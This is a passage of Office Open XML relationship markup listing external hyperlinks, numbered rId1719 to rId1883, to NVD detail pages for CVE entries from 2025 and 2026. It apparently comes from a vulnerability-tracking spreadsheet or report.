TargetMode="External" Id="rId1719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16180" TargetMode="External" Id="rId1720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67550" TargetMode="External" Id="rId1721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70609" TargetMode="External" Id="rId1736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85788" TargetMode="External" Id="rId1737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88035" TargetMode="External" Id="rId1738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0293" TargetMode="External" Id="rId1739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId1740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73647" TargetMode="External" Id="rId1741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78043" TargetMode="External" Id="rId1742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81830" TargetMode="External" Id="rId1744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId1745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId1746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48651" TargetMode="External" Id="rId1747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51619" TargetMode="External" Id="rId1748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0636" TargetMode="External" Id="rId1749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16689" TargetMode="External" Id="rId1750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17270" TargetMode="External" Id="rId1751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17440" TargetMode="External" Id="rId1752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17442" TargetMode="External" Id="rId1753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17469" TargetMode="External" Id="rId1754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18622" TargetMode="External" Id="rId1755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18858" TargetMode="External" Id="rId1756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19649" TargetMode="External" Id="rId1757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24049" TargetMode="External" Id="rId1758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32591" TargetMode="External" Id="rId1763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45376" TargetMode="External" Id="rId1764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49831" TargetMode="External" Id="rId1765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49833" TargetMode="External" Id="rId1766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54422" TargetMode="External" Id="rId1767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63004" TargetMode="External" Id="rId1768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64369" TargetMode="External" Id="rId1769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64370" TargetMode="External" Id="rId1770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64371" TargetMode="External" Id="rId1771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64376" TargetMode="External" Id="rId1772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68514" TargetMode="External" Id="rId1773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId1822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70592" TargetMode="External" Id="rId1823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71441" TargetMode="External" Id="rId1825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId1826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73973" TargetMode="External" Id="rId1831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73974" TargetMode="External" Id="rId1832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86213" TargetMode="External" Id="rId1863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86220" TargetMode="External" Id="rId1864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86221" TargetMode="External" Id="rId1865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86222" TargetMode="External" Id="rId1866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86223" TargetMode="External" Id="rId1867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86224" TargetMode="External" Id="rId1868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86225" TargetMode="External" Id="rId1869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86260" TargetMode="External" Id="rId1870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86261" TargetMode="External" Id="rId1871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86262" TargetMode="External" Id="rId1872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86263" TargetMode="External" Id="rId1873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86273" TargetMode="External" Id="rId1874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86274" TargetMode="External" Id="rId1875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86282" TargetMode="External" Id="rId1876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86284" TargetMode="External" Id="rId1877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86318" TargetMode="External" Id="rId1878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86319" TargetMode="External" Id="rId1879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86321" TargetMode="External" Id="rId1880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 